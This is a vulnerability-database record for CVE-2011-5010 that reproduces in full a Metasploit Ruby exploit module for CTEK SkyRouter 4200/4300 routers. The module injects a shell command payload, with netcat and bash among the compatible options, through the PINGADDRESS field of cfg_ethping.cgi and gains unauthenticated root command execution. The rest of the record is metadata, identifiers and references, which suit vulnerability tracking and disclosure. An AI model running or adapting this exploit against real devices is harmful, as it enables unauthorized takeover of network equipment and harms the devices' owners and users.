ID
VAR-E-201111-0297
CVE
| cve_id: | CVE-2011-5010 | Trust: 1.9 |
EDB ID
18172
TITLE
CTEK SkyRouter 4200/4300 - Command Execution (Metasploit) - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
CTEK SkyRouter 4200/4300 - Command Execution (Metasploit). CVE-2011-5010CVE-77497 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | ctek | model: | skyrouter | scope: | eq | version: | 4200/4300 | Trust: 1.0 |
| vendor: | ctek | model: | skyrouter | scope: | eq | version: | 43000 | Trust: 0.3 |
| vendor: | ctek | model: | skyrouter | scope: | eq | version: | 42000 | Trust: 0.3 |
EXPLOIT
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CTEK SkyRouter 4200 and 4300 Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
},
'Author' => [ 'savant42' ], #with module help from kos
'License' => MSF_LICENSE,
'References' => [ 'URL', 'http://dev.metasploit.com/redmine/issues/5610'],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet netcat-e bash',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Sep 8 2011', # CGI historical date :)
'DefaultTarget' => 0))
end
def exploit
post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26"
uri = '/apps/a3/cfg_ethping.cgi'
print_status("Sending HTTP request for #{uri}")
res = send_request_cgi( {
'global' => true,
'uri' => uri,
'method' => "POST",
'data' => post_data
}, 30)
if res
print_status("The server responded with HTTP CODE #{res.code}")
else
print_status("The server did not respond to our request")
end
handler
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Command Execution (Metasploit)
Trust: 1.0
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2011-5010 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 18172 | Trust: 1.6 |
| db: | EDBNET | id: | 40630 | Trust: 0.6 |
| db: | BID | id: | 50867 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-5010 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/18172/ | Trust: 0.6 |
| url: | http://www.ctekproducts.com/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 50867 |
| db: | EXPLOIT-DB | id: | 18172 |
| db: | EDBNET | id: | 40630 |
LAST UPDATE DATE
2022-07-27T09:16:01.675000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 50867 | date: | 2012-01-03T22:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 50867 | date: | 2011-11-30T00:00:00 |
| db: | EXPLOIT-DB | id: | 18172 | date: | 2011-11-30T00:00:00 |
| db: | EDBNET | id: | 40630 | date: | 2011-11-30T00:00:00 |